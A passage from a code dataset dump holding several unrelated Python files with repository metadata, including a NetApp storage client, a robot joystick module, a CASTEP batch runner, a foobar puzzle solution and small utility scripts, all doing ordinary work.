Message - %(msg)s\",\n {'path': path, 'msg': six.text_type(e)})\n return geometry\n\n def get_volume_options(self, volume_name):\n \"\"\"Get the value for the volume option.\"\"\"\n opts = []\n vol_option_list = netapp_api.NaElement(\"volume-options-list-info\")\n vol_option_list.add_new_child('volume', volume_name)\n result = self.connection.invoke_successfully(vol_option_list, True)\n options = result.get_child_by_name(\"options\")\n if options:\n opts = options.get_children()\n return opts\n\n def move_lun(self, path, new_path):\n \"\"\"Moves the LUN at path to new path.\"\"\"\n seg = path.split(\"/\")\n new_seg = new_path.split(\"/\")\n LOG.debug(\"Moving LUN %(name)s to %(new_name)s.\",\n {'name': seg[-1], 'new_name': new_seg[-1]})\n lun_move = netapp_api.NaElement(\"lun-move\")\n lun_move.add_new_child(\"path\", path)\n lun_move.add_new_child(\"new-path\", new_path)\n self.connection.invoke_successfully(lun_move, True)\n\n def get_iscsi_target_details(self):\n \"\"\"Gets the iSCSI target portal details.\"\"\"\n raise NotImplementedError()\n\n def get_fc_target_wwpns(self):\n \"\"\"Gets the FC target details.\"\"\"\n raise NotImplementedError()\n\n def get_iscsi_service_details(self):\n \"\"\"Returns iscsi iqn.\"\"\"\n raise NotImplementedError()\n\n def check_iscsi_initiator_exists(self, iqn):\n \"\"\"Returns True if initiator exists.\"\"\"\n raise NotImplementedError()\n\n def set_iscsi_chap_authentication(self, iqn, username, password):\n \"\"\"Provides NetApp host's CHAP credentials to the backend.\"\"\"\n raise NotImplementedError()\n\n def get_lun_list(self):\n \"\"\"Gets the list of LUNs on filer.\"\"\"\n raise NotImplementedError()\n\n def get_igroup_by_initiators(self, initiator_list):\n \"\"\"Get igroups exactly matching a set of initiators.\"\"\"\n raise NotImplementedError()\n\n def _validate_qos_policy_group(self, is_adaptive, spec=None, is_nfs=False):\n \"\"\"Raises an exception if the backend doesn't support the QoS spec.\"\"\"\n raise NotImplementedError()\n\n def _has_luns_mapped_to_initiator(self, initiator):\n \"\"\"Checks whether any LUNs are mapped to the given initiator.\"\"\"\n lun_list_api = netapp_api.NaElement('lun-initiator-list-map-info')\n lun_list_api.add_new_child('initiator', initiator)\n result = self.connection.invoke_successfully(lun_list_api, True)\n lun_maps_container = result.get_child_by_name(\n 'lun-maps') or netapp_api.NaElement('none')\n return len(lun_maps_container.get_children()) > 0\n\n def has_luns_mapped_to_initiators(self, initiator_list):\n \"\"\"Checks whether any LUNs are mapped to the given initiator(s).\"\"\"\n for initiator in initiator_list:\n if self._has_luns_mapped_to_initiator(initiator):\n return True\n return False\n\n def get_lun_by_args(self, **args):\n \"\"\"Retrieves LUNs with specified args.\"\"\"\n raise NotImplementedError()\n\n def get_performance_counter_info(self, object_name, counter_name):\n \"\"\"Gets info about one or more Data ONTAP performance counters.\"\"\"\n\n api_args = {'objectname': object_name}\n result = self.connection.send_request('perf-object-counter-list-info',\n api_args,\n enable_tunneling=False)\n\n counters = result.get_child_by_name(\n 'counters') or netapp_api.NaElement('None')\n\n for counter in counters.get_children():\n\n if counter.get_child_content('name') == counter_name:\n\n labels = []\n label_list = counter.get_child_by_name(\n 'labels') or netapp_api.NaElement('None')\n for label in label_list.get_children():\n labels.extend(label.get_content().split(','))\n base_counter = 
counter.get_child_content('base-counter')\n\n return {\n 'name': counter_name,\n 'labels': labels,\n 'base-counter': base_counter,\n }\n else:\n raise exception.NotFound(_('Counter %s not found') % counter_name)\n\n def delete_snapshot(self, volume_name, snapshot_name):\n \"\"\"Deletes a volume snapshot.\"\"\"\n api_args = {'volume': volume_name, 'snapshot': snapshot_name}\n self.connection.send_request('snapshot-delete', api_args)\n\n def create_cg_snapshot(self, volume_names, snapshot_name):\n \"\"\"Creates a consistency group snapshot out of one or more flexvols.\n\n ONTAP requires an invocation of cg-start to first fence off the\n flexvols to be included in the snapshot. If cg-start returns\n success, a cg-commit must be executed to finalized the snapshot and\n unfence the flexvols.\n \"\"\"\n cg_id = self._start_cg_snapshot(volume_names, snapshot_name)\n if not cg_id:\n msg = _('Could not start consistency group snapshot %s.')\n raise exception.VolumeBackendAPIException(data=msg % snapshot_name)\n self._commit_cg_snapshot(cg_id)\n\n def _start_cg_snapshot(self, volume_names, snapshot_name):\n snapshot_init = {\n 'snapshot': snapshot_name,\n 'timeout': 'relaxed',\n 'volumes': [\n {'volume-name': volume_name} for volume_name in volume_names\n ],\n }\n result = self.connection.send_request('cg-start', snapshot_init)\n return result.get_child_content('cg-id')\n\n def _commit_cg_snapshot(self, cg_id):\n snapshot_commit = {'cg-id': cg_id}\n self.connection.send_request('cg-commit', snapshot_commit)\n\n def get_snapshot(self, volume_name, snapshot_name):\n \"\"\"Gets a single snapshot.\"\"\"\n raise NotImplementedError()\n\n @utils.retry(exception.SnapshotIsBusy)\n def wait_for_busy_snapshot(self, flexvol, snapshot_name):\n \"\"\"Checks for and handles a busy snapshot.\n\n If a snapshot is busy, for reasons other than cloning, an exception is\n raised immediately. Otherwise, wait for a period of time for the clone\n dependency to finish before giving up. 
If the snapshot is not busy then\n no action is taken and the method exits.\n \"\"\"\n snapshot = self.get_snapshot(flexvol, snapshot_name)\n if not snapshot['busy']:\n LOG.debug(\"Backing consistency group snapshot %s available for \"\n \"deletion.\", snapshot_name)\n return\n else:\n LOG.debug(\"Snapshot %(snap)s for vol %(vol)s is busy, waiting \"\n \"for volume clone dependency to clear.\",\n {\"snap\": snapshot_name, \"vol\": flexvol})\n raise exception.SnapshotIsBusy(snapshot_name=snapshot_name)\n\n def mark_snapshot_for_deletion(self, volume, snapshot_name):\n \"\"\"Mark snapshot for deletion by renaming snapshot.\"\"\"\n return self.rename_snapshot(\n volume, snapshot_name, DELETED_PREFIX + snapshot_name)\n\n def rename_snapshot(self, volume, current_name, new_name):\n \"\"\"Renames a snapshot.\"\"\"\n api_args = {\n 'volume': volume,\n 'current-name': current_name,\n 'new-name': new_name,\n }\n return self.connection.send_request('snapshot-rename', api_args)\n","repo_name":"openstack/cinder","sub_path":"cinder/volume/drivers/netapp/dataontap/client/client_base.py","file_name":"client_base.py","file_ext":"py","file_size_in_byte":17544,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"36099626834","text":"#!/usr/bin/env python3\nimport os\nimport numpy as np\nimport glob\nfrom plyfile import PlyData\nfrom tqdm import tqdm\nimport pickle as pkl\nfrom fps.fps_utils import farthest_point_sampling\nfrom argparse import ArgumentParser\n\n\nparser = ArgumentParser()\nparser.add_argument(\"ply_pth\", type=str, help=\"path to the input ply mesh model.\")\nparser.add_argument(\"sv_fd\", type=str, help=\"path to save the generated mesh info.\")\nparser.print_help()\nargs = parser.parse_args()\n\n\n# Read object vertexes from ply file\ndef get_p3ds_from_ply(ply_pth):\n print(\"loading p3ds from ply:\", ply_pth)\n ply = PlyData.read(ply_pth)\n data = ply.elements[0].data\n x = data['x']\n y = data['y']\n z = data['z']\n p3ds = np.stack([x, y, z], axis=-1)\n print(\"finish loading ply.\")\n return p3ds\n\n\n# Read object vertexes from text file\ndef get_p3ds_from_txt(pxyz_pth):\n pointxyz = np.loadtxt(pxyz_pth, dtype=np.float32)\n return pointxyz\n\n\n# Compute the 3D bounding box from object vertexes\ndef get_corners_3d(p3ds, small=False):\n x = p3ds[:, 0]\n min_x, max_x = np.min(x), np.max(x)\n y = p3ds[:, 1]\n min_y, max_y = np.min(y), np.max(y)\n z = p3ds[:, 2]\n min_z, max_z = np.min(z), np.max(z)\n corners_3d = np.array([\n [min_x, min_y, min_z],\n [min_x, min_y, max_z],\n [min_x, max_y, min_z],\n [min_x, max_y, max_z],\n [max_x, min_y, min_z],\n [max_x, min_y, max_z],\n [max_x, max_y, min_z],\n [max_x, max_y, max_z],\n ])\n if small:\n center = np.mean(corners_3d, 0)\n corners_3d = (corners_3d - center[None,:]) * 2.0 / 3.0 + center[None,:]\n return corners_3d\n\n\n# Compute the radius of object\ndef get_radius(corners_3d):\n radius = np.linalg.norm(np.max(corners_3d, 0)-np.min(corners_3d, 0)) / 2.0\n return radius\n\n\n# Compute the center of object\ndef get_centers_3d(corners_3d):\n centers_3d=(np.max(corners_3d, 0) + np.min(corners_3d, 0)) / 2\n return centers_3d\n\n\n# Select keypoint with Farthest Point Sampling (FPS) algorithm\ndef get_farthest_3d(p3ds, num=8, init_center=False):\n fps = farthest_point_sampling(p3ds, num, init_center=init_center)\n return fps\n\n\n# Compute and save all mesh info\ndef gen_one_mesh_info(ply_pth, sv_fd):\n if not os.path.exists(sv_fd):\n os.system(\"mkdir -p %s\" % sv_fd)\n p3ds = 
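get_p3ds_from_ply(ply_pth)  # (N, 3) array of vertex coordinates loaded from the mesh (descriptive note)\n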
\n    c3ds = get_corners_3d(p3ds)\n    c3ds_pth = os.path.join(sv_fd, \"corners.txt\")\n    with open(c3ds_pth, 'w') as of:\n        for p3d in c3ds:\n            print(p3d[0], p3d[1], p3d[2], file=of)\n\n    radius = get_radius(c3ds)\n    r_pth = os.path.join(sv_fd, \"radius.txt\")\n    with open(r_pth, 'w') as of:\n        print(radius, file=of)\n\n    ctr = get_centers_3d(c3ds)\n    ctr_pth = os.path.join(sv_fd, \"center.txt\")\n    with open(ctr_pth, 'w') as of:\n        print(ctr[0], ctr[1], ctr[2], file=of)\n\n    fps = get_farthest_3d(p3ds, num=8)\n    fps_pth = os.path.join(sv_fd, \"farthest.txt\")\n    with open(fps_pth, 'w') as of:\n        for p3d in fps:\n            print(p3d[0], p3d[1], p3d[2], file=of)\n\n\ndef test():\n    ply_pth = '../../../datasets/ycb/YCB_Video_Dataset/models/002_master_chef_can/textured.ply'\n    gen_one_mesh_info(ply_pth, 'mesh_info/002_master_chef_can')\n\n\ndef main():\n    # test()\n    gen_one_mesh_info(args.ply_pth, args.sv_fd)\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n# vim: ts=4 sw=4 sts=4 expandtab\n","repo_name":"ethnhe/PVN3D","sub_path":"pvn3d/lib/utils/dataset_tools/gen_obj_info.py","file_name":"gen_obj_info.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"66"} +{"seq_id":"13681901205","text":"#!/usr/bin/env pybricks-micropython\n# coding=utf-8\n\nimport sys\nimport socket\nimport struct\nimport uselect\nimport _thread\nimport moduler.config as config\nfrom pybricks.hubs import EV3Brick\nfrom moduler.funksjoner import Bunch\n\n# Set up socket for joystick inputs\ndef InputSocket(robot,Configs):\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    robot.inputSock = sock\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.bind((\"\", 8080))\n    sock.listen(1)\n\n    if not Configs.livePlot:\n        print(\"Waiting for joystick connection from computer (Run the file called 'Run_2_PC.py')\")\n    robot.brick.speaker.beep()\n\n    # Receive the connection and send back an \"acknowledgment\" as bytes\n    connection, _ = sock.accept()\n    connection.setblocking(False)\n    connection.send(b\"ack\")\n\n    if not Configs.livePlot:\n        print(\"Acknowledgment sent to joystick on computer.\")\n    robot.JoystickConnection = connection\n\n\ndef Initialize(Configs):\n    \n    # contains all info about the robot\n    robot = Bunch()\n    robot.brick = EV3Brick()\n\n    # joystick contains all info about the joystick.\n    robot.joystick = infoJoystick()\n\n    if Configs.ConnectJoystickToPC and robot.joystick[\"id\"] != None:\n        print('____ ERROR CONNECTING THE JOYSTICK ____')\n        print(\"To use a joystick on robot, you must specify Configs.ConnectJoystickToPC=False\")\n        print(\"To use a joystick on PC/Mac, you must specify Configs.ConnectJoystickToPC=True\")\n        print(\"You have specified Configs.ConnectJoystickToPC=True, but the joystick is connected to the robot.\")\n        print('________________________________________')\n        print()\n        raise Exception()\n\n\n    if Configs.ConnectJoystickToPC:\n        print('__ PLEASE CONNECT JOYSTICK TO PC/MAC! __')\n        print('Configs.ConnectJoystickToPC = True')\n        print(\"You have chosen to connect the joystick to the PC/Mac.\")\n        print(\"______________________________________________________\")\n        print()\n\n    \n    if Configs.ConnectJoystickToPC:\n        _thread.start_new_thread(InputSocket, (robot,Configs)) \n\n    if Configs.livePlot:\n        # Set up the socket object and listen for a connection\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        robot.sock = sock\n        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        sock.bind((\"\", 8070))\n        sock.listen(1)\n\n        # Beep from the robot and print in the terminal\n        # to show that it is ready for a socket connection from the PC\n        print(\"Waiting for connection from computer.\")\n        robot.brick.speaker.beep()\n\n        # Receive the connection and send back an \"acknowledgment\" as bytes\n        connection, _ = sock.accept()\n        connection.send(b\"ack\")\n        print(\"Acknowledgment sent to computer.\")\n        robot.connection = connection\n\n    if Configs.ConnectJoystickToPC:\n        while not \"JoystickConnection\" in robot.__dict__:\n            pass\n        print('Ready to read joystick inputs from PC/Mac')\n\n    \n    # The file where all your data is stored\n    robot.dataToFile = open(Configs.filename, \"w\")\n    return robot\n\n\n\ndef identifyJoystick():\n    \"\"\"\n    Identifies which joystick is connected;\n    either logitech or dacota (or possibly another joystick).\n    This function should not be changed.\n    \"\"\"\n\n    for i in range(2, 1000):\n        path = (\"/dev/bus/usb/001/{:03d}\".format(i))\n        try:\n            with open(path, \"rb\") as f:\n                joy = f.read()\n            if joy[2] == 16:\n                return \"logitech\"\n            elif joy[2] == 0:\n                return \"dacota\"\n            else:\n                return \"Unknown joystick.\"\n        except:\n            # print(\"Error in identifyJoystick!\")\n            pass\n\n\n\ndef infoJoystick():\n    \"\"\"\n    Fills out and returns a \"joystick\" dictionary that contains all info about the joystick.\n    The keys in the dictionary are as follows:\n    \"id\" - return value from identifyJoystick()\n    \"scale\" - scaling value, depending on which joystick is used\n    \"FORMAT\" - long int x2, unsigned short x2, unsigned int\n    \"EVENT_SIZE\" - struct.calcsize of \"FORMAT\"\n    \"in_file\" - where the joystick's movements are stored on the EV3\n    \"\"\"\n\n    joystick = {}\n    joystick[\"id\"] = identifyJoystick()\n    \n    joyScale = 0\n    if joystick[\"id\"] == \"logitech\":\n        joyScale = 1024\n\n    elif joystick[\"id\"] == \"dacota\":\n        joyScale = 255\n\n\n    joystick[\"scale\"] = joyScale\n    joystick[\"FORMAT\"] = 'llHHI'\n    joystick[\"EVENT_SIZE\"] = struct.calcsize(joystick[\"FORMAT\"])\n    try:\n        joystick[\"in_file\"] = open(\"/dev/input/event2\", \"rb\")\n    except OSError: # if no joystick is connected\n        joystick[\"in_file\"] = None\n    return joystick\n\ndef getJoystickValues(robot):\n    print(\"Joystick thread started\")\n\n    event_poll = uselect.poll()\n    if robot.joystick[\"in_file\"] is not None:\n        event_poll.register(robot.joystick[\"in_file\"], uselect.POLLIN)\n    else:\n        return\n    while True:\n        events = event_poll.poll(0)\n        if len(events) > 0 and events[0][1] & uselect.POLLIN:\n            try:\n                (_, _, ev_type, code, value) = struct.unpack(\n                    robot.joystick[\"FORMAT\"],\n                    robot.joystick[\"in_file\"].read(\n                        robot.joystick[\"EVENT_SIZE\"]))\n            except Exception as e:\n                sys.print_exception(e)\n            if ev_type == 1:\n\n                # When the buttons are released, state should\n                # fall back to 0. Also converts False/True to numeric values\n                # that are written to file and can therefore be converted in matlab.\n                if value == 0:\n                    state = 0\n                else:\n                    state = 1\n                #_______________________________________\n                \n                if code == 288:\n                    config.joy1Instance = state\n                    config.joyMainSwitch = state\n                elif code == 289:\n                    config.joy2Instance = state\n                elif code == 290:\n                    config.joy3Instance = state\n                elif code == 291:\n                    config.joy4Instance = state\n                elif code == 292:\n                    config.joy5Instance = state\n                elif code == 293:\n                    config.joy6Instance = state\n                elif code == 294:\n                    config.joy7Instance = state\n                elif code == 295:\n                    config.joy8Instance = state \n                elif code == 296:\n                    config.joy9Instance = state\n                elif code == 297:\n                    config.joy10Instance = state\n                elif code == 298:\n                    config.joy11Instance = state\n                elif code == 299:\n                    config.joy12Instance = state\n                else:\n                    # indicates that I have forgotten to include a button; add it to the code\n                    print(\"--------------------------------------\")\n                    print(\"Unknown code!\")\n                    print(\"ev_type: \" + str(ev_type) + \". code: \" + str(code) + \". value: \" + str(value) + \".\")\n                    print(\"--------------------------------------\")\n\n            elif ev_type == 3:\n                # all dacota-related information (code 2 and code 5 for dacota) is uncertain, test?\n                if code == 0:\n                    config.joySideInstance = scale(\n                        value,\n                        (robot.joystick[\"scale\"], 0),\n                        (100, -100))\n                elif code == 1:\n                    config.joyForwardInstance = scale(\n                        value,\n                        (0, robot.joystick[\"scale\"]),\n                        (100, -100))\n                elif code == 2 and robot.joystick[\"id\"] == \"dacota\":\n                    #POTENTIOMETER - dacota - UNCERTAIN\n                    config.joyPotMeterInstance = scale(\n                        value,\n                        (255, 0),\n                        (-100, +100))\n                elif code == 5:\n                    #TORSION - dacota and logitech\n                    config.joyTwistInstance = scale(\n                        value,\n                        (255, 0),\n                        (+100, -100))\n                elif code == 6 and robot.joystick[\"id\"] == \"logitech\":\n                    #POTENTIOMETER - logitech\n                    config.joyPotMeterInstance = scale(\n                        value,\n                        (255, 0),\n                        (-100, +100))\n\n                # LOGITECH/DACOTA POV/HAT\n                elif code == 16:\n                    # POV/hat switch - right - left, 1 - 4294967295\n                    if value == 0:\n                        state = 0\n                    else:\n                        state = scale(value,(4294967295, 1),(-1,+1))\n                    config.joyPOVSideInstance = state\n                elif code == 17:\n                    # POV/hat switch - down - up, 1 - 4294967295\n                    if value == 0:\n                        state = 0\n                    else:\n                        state = scale(value,(1, 4294967295),(-1,+1))\n                    config.joyPOVForwardInstance = state\n\n\ndef CloseFile(robot):\n    if robot.joystick[\"in_file\"] != None:\n        try:\n            robot.joystick[\"in_file\"].close()\n        except ValueError: # file already closed\n            pass\n\n    try:\n        robot.dataToFile.close()\n    except ValueError: # file already closed\n        pass\n    \n\n\ndef CloseJoystick(robot,Configs): \n    if \"JoystickConnection\" in robot.__dict__:\n        try:\n            robot.JoystickConnection.send(b\"end?\")\n        except OSError:\n            pass\n        robot.JoystickConnection.close()\n    \n    if Configs.livePlot:\n        try:\n            robot.connection.send(b\"end?\")\n        except OSError:\n            pass\n        robot.connection.close()\n\n    if \"sock\" in robot.__dict__:\n        robot.sock.close()\n\n\n\ndef scale(value, src, dst):\n    return ((float(value - src[0])\n             / (src[1] - src[0])) * (dst[1] - dst[0])\n             + dst[0])","repo_name":"Hakurem/LegoPython","sub_path":"Prosjekt00_TestOppkopling/moduler/EV3AndJoystick.py","file_name":"EV3AndJoystick.py","file_ext":"py","file_size_in_byte":10225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4754856511","text":"#!/usr/bin/env python\n'''\n    Author: Ran Zheng\n    \n    Source of demofiles: http://www.castep.org/Tutorials/BasicsAndBonding\n'''\n\nimport psutil as psl\n
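# psutil (imported above) is used below to enumerate running processes (descriptive note).\nimport 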
time as t\nimport os\n\ndef checkProcessIsExist(processName):\n '''\n Check if the process processName exists.\n '''\n flag = False\n for pid in psl.pids():\n # Check if process name contains the given processName.\n if psl.Process(pid).name().lower() == processName.lower():\n flag = True\n break\n return flag\n\ndef getFiles(suffix,dir=os.getcwd()):\n '''\n Get the file name of the specified folder *dir* and its subfolders in the specified format.\n '''\n rename = []\n # Iterate through the specified folder and its subfolders.\n for root,directory,files in os.walk(dir,topdown=True):\n for filename in files:\n # Split filename and suffix.\n fname,suf = os.path.splitext(filename)\n # Check if suf name contains the given suffix.\n if suf.lower() == suffix.lower():\n rename.append(os.path.join(root,fname))\n return(rename)\n\n# Notes: You need to prepare .param file corresponding to .cell file in the folder where you need to calculate.\nsuffix = '.cell'\n# You can set fpath to any folder path you want to calculate, and the path where runCASTEP.py is located as the default path. \nfpath = os.getcwd()\n\nfname = getFiles(suffix,fpath)\n# Number of CPU cores, you can customize **ncore** according to your CPU cores.\nncore = 4\nprocessName = 'castep.mpi'\n\ntaskId = 1\nif len(fname) > 0:\n for name in fname:\n cmd = 'mpirun -np '+ str(ncore)+' castep.mpi ' + name\n print('Task No.: '+ str(taskId)+'; Task Name: '+name)\n if taskId == 1:\n # Execute castep.mpi command\n os.system(cmd)\n else:\n while True:\n if checkProcessIsExist(processName):\n # Pause 1.5 seconds to avoid frequent judgments\n t.sleep(1.5)\n continue\n else:\n # Execute CASTEP\n os.system(cmd)\n break\n print()\n taskId += 1\n print('Task completed!')\nelse:\n print(\"No files in \" + suffix + \" format exist in the specified folder and its subfolders\")\n","repo_name":"ranzhengcode/runCASTEP","sub_path":"runCASTEP.py","file_name":"runCASTEP.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4636692743","text":"from l4e2_test_visualisation import visu2\r\n\r\na=[([3,2], [1,1], [2,1], 4)]\r\nb=[7]\r\n\r\na.append(([300,275], [150,150], [185,100], 500))\r\nb.append(9)\r\n\r\n\r\na.append(([10,10], [4,4], [3,3], 5000))\r\nb.append(739323)\r\n\r\na.append(([2,5], [1,2], [1,4], 11))\r\nb.append(27)\r\n\r\na.append(([23,10], [6,4], [3,2], 23))\r\nb.append(8)\r\n\r\n\r\na.append(([1250,1250], [1000,1000], [500,400], 10000))\r\nb.append(196)\r\n\r\na.append(([3,2], [1,1], [2,1], 8))\r\nb.append('jsp')\r\n\r\na.append(([8,4], [1,1], [1,2], 50))\r\nb.append('jsp')\r\n\r\na.append(([8,4], [7,3], [1,1], 8))\r\nb.append('jsp')\r\n\r\na.append(([20,20], [2,2], [2,4], 5))\r\nb.append('jsp')\r\n\r\n#==wrong answers==\r\na.append([[11, 14], [6, 8], [5, 1], 93])\r\na.append([[5, 4], [3, 1], [1, 2], 22])\r\na.append([[9, 42], [7, 9], [2, 4], 25])\r\n\r\n\r\n\r\ni=12\r\n\r\n\r\nimport math\r\nimport numpy as np\r\n\r\ndef getAngle(a):\r\n u1=np.array(a)/np.linalg.norm(np.array(a))\r\n if a[1]>0:\r\n angle=np.arccos(np.clip(np.dot(u1, np.array([1,0])), -1.0, 1.0))\r\n else:\r\n angle=-np.arccos(np.clip(np.dot(u1, np.array([1,0])), -1.0, 1.0))\r\n return(\"{:.12f}\".format(angle))\r\n\r\ndef length(shoot):\r\n return(math.sqrt(shoot[0]**2+shoot[1]**2))\r\n\r\ndef solution(dimensions, your_position, trainer_position, distance):\r\n possibleHeight=int(distance//dimensions[1])+1\r\n possibleWidth=int(distance//dimensions[0])+1\r\n targetShoots={}\r\n 
selfShoots={}\r\n \r\n for i in range(-possibleHeight,possibleHeight+1):\r\n if not i%2:\r\n targety=i*dimensions[1]+trainer_position[1]\r\n selfy=i*dimensions[1]+your_position[1]\r\n else:\r\n targety=(i+1)*dimensions[1]-trainer_position[1]\r\n selfy=(i+1)*dimensions[1]-your_position[1]\r\n \r\n for j in range(-possibleWidth,possibleWidth+1):\r\n if not j%2:\r\n targetx=j*dimensions[0]+trainer_position[0]\r\n selfx=j*dimensions[0]+your_position[0]\r\n else:\r\n targetx=(j+1)*dimensions[0]-trainer_position[0]\r\n selfx=(j+1)*dimensions[0]-your_position[0]\r\n\r\n targetshoot=[targetx-your_position[0],targety-your_position[1]]\r\n selfshoot=[selfx-your_position[0],selfy-your_position[1]]\r\n \r\n if length(selfshoot)<=distance and selfshoot!=[0,0]:\r\n angle=getAngle(selfshoot)\r\n if angle in selfShoots.keys():\r\n selfShoots[angle].append(length(selfshoot))\r\n else:\r\n selfShoots[angle]=[length(selfshoot)]\r\n\r\n if length(targetshoot)<=distance:\r\n angle=getAngle(targetshoot)\r\n if angle in targetShoots.keys():\r\n targetShoots[angle].append(length(targetshoot))\r\n else:\r\n targetShoots[angle]=[length(targetshoot)]\r\n goodShoots={}\r\n for angle in targetShoots.keys():\r\n if angle in selfShoots.keys():\r\n if min(selfShoots[angle])>=min(targetShoots[angle]):\r\n goodShoots[angle]=min(targetShoots[angle])\r\n else:\r\n goodShoots[angle]=min(targetShoots[angle])\r\n\r\n visu2(your_position,distance,goodShoots,targetShoots,selfShoots,dimensions)\r\n return(len(goodShoots))\r\n\r\nprint(solution(a[i][0],a[i][1],a[i][2],a[i][3]))\r\n","repo_name":"hugoleborso/foobar","sub_path":"levels/4/l4e2_test_close.py","file_name":"l4e2_test_close.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32964698147","text":"import subprocess\n\n#\n# Test for Scout2.py\n#\nclass TestScout2Class:\n\n #\n # Make sure that Scout2 does not crash with --help\n #\n def test_scout2_help(self):\n command = './Scout2.py --help'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n assert process.returncode == 0\n\n #\n # Make sure that Scout2's default run does not crash\n #\n def test_scout2_default_run(self):\n command = './Scout2.py --force'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n process.wait()\n assert process.returncode == 0\n","repo_name":"saiteja16/Scout2","sub_path":"tests/test-scout2.py","file_name":"test-scout2.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"27836441717","text":"import re\n\nwith open('idiot.txt') as f1:\n with open('igrok.txt') as f2:\n words = re.findall(r'[\\w]+', f1.read()) + re.findall(r'[\\w]+', f2.read())\n freq = dict()\n\n for x in words:\n if x in freq.keys():\n freq[x][0] += 1\n else:\n freq[x] = [1, 0.0]\n\n count = len(words)\n for x in freq.keys():\n freq[x][1] = freq[x][0] / count\n\n freq = dict(sorted(freq.items(), key=lambda item: item[1][0], reverse=True))\n\n for k, v in freq.items():\n print(k, *v)","repo_name":"zzemlyanaya/PythonEdu","sub_path":"uni/python_3sem/task1/markov_graphs.py","file_name":"markov_graphs.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14694992930","text":"active = False\nwhile active == False:\n\n print(\"please enter your 5 marks below\")\n\n#read 5 inputs 
(missing int( before (input)))\n mark1 = int(input(\"enter mark 1: \"))\n mark2 = int(input(\"enter mark 2: \"))\n mark3 = int(input(\"enter mark 3: \"))\n mark4 = int(input(\"enter mark 4: \"))\n mark5 = int(input(\"enter mark 5: \"))\n\n\n\n#determine if scores are between 0 and 100, if not, reload program from beginning. (this was missing in the initial version)\n if mark1 < 0 or mark1 > 100 or mark2 < 0 or mark2 > 100 or mark3 < 0 or mark3 > 100 or mark4 < 0 or mark4 > 100 or mark5 < 0 or mark5 > 100:\n print(\"error: marks must be between 0 and 100\")\n else:\n active = True\n \n#create array/list with five marks\nmarksList = [mark1, mark2, mark3, mark4, mark5]\n\n#print the array/list (simply added an asterisk before marksList to create a mathematical expression)\nprint(*marksList)\n\n#calculate the sum and average\nsumOfMarks = sum(marksList)\naverageOfMarks = sum(marksList)/5\n\n#display results\nprint(\"The sum of your marks is: \"+str(sumOfMarks))\nprint(\"The average of your marks is: \"+str(averageOfMarks))\n","repo_name":"RayyanHodges/Marks","sub_path":"marks.py","file_name":"marks.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"594588592","text":"import sys\nimport time\nimport datetime\nimport os\n\nstartTime = datetime.datetime.now()\n\nnameScript = 'get-ngavHostData'\n\npathDirRoot = os.path.dirname(__file__)\npathDirOutput = pathDirRoot + '\\\\output\\\\'\npathDirLog = pathDirRoot + '\\\\log\\\\'\n\nnameFileLog = nameScript + '_log.txt'\npathFileLog = pathDirLog + nameFileLog\n\nnameFileLogOld = nameScript + '_log_old.txt'\npathFileLogOld = pathDirLog + nameFileLogOld\n\nnameFileDataCurrent = nameScript + '_current.csv'\npathFileDataCurrent = pathDirOutput + nameFileDataCurrent\n\nnameFileDataPrevious = nameScript + '_previous.csv'\npathFileDataPrevious = pathDirOutput + nameFileDataPrevious\n\n\ndef log(data, s=0, e=0, f=1):\n\n\tif e == 1:\n\t\texcInfo = sys.exc_info()\n\t\tprint(data)\n\t\tprint(excInfo)\n\telse:\n\t\tprint(data)\n\t\n\tif s == 1:\n\t\tseparator = '/' * 50\n\t\tprint(separator + '\\n')\n\t\n\tif f == 1: # write to file\n\t\tdateTimeNow = str(datetime.datetime.now())\n\t\tobjFile = open(pathFileLog, 'a')\t\n\t\tobjFile.write(dateTimeNow + ' - ' + data + '\\n')\n\n\t\tif e == 1:\n\t\t\tobjFile.write(dateTimeNow + ' - ' + excInfo + '\\n')\n\n\t\tif s == 1:\n\t\t\tobjFile.write(dateTimeNow + ' - ' + separator + '\\n')\n\n\t\tobjFile.close()\n\n#log(pathDirOutput)\n\n\ndef manageDataFile(fileCurrent, filePrevious):\n\t\n\tlog('managing data files ..')\n\tif os.path.exists(fileCurrent) == True and os.path.exists(filePrevious) == True:\n\t\tlog('.. deleting ' + filePrevious + ' ..')\n\t\tos.remove(filePrevious)\n\t\tlog('.. deleting ' + filePrevious + ' done')\n\t\n\tif os.path.exists(fileCurrent) == True:\n\t\tlog('.. renaming ' + fileCurrent + ' ..')\n\t\tos.rename(fileCurrent, filePrevious)\n\t\tlog('.. renaming ' + fileCurrent + ' done')\n\n\t\tobjFile = open(fileCurrent, 'w')\n\t\tobjFile.close()\n\t\n\tlog('managing data files done', s=1)\n\n#manageDataFile(pathFileDataCurrent, pathFileDataPrevious)\n\n\ndef manageLogFile(fileLog, fileLogOld, daysBack):\n\t\n\tif os.path.exists(fileLog) == True:\n\n\t\tlog('checking current log file: ' + fileLog + ' ..')\n\n\t\ttimeNow = time.time()\n\t\ttimeDaysBack = timeNow - daysBack * 86400\n\t\tlog('.. 
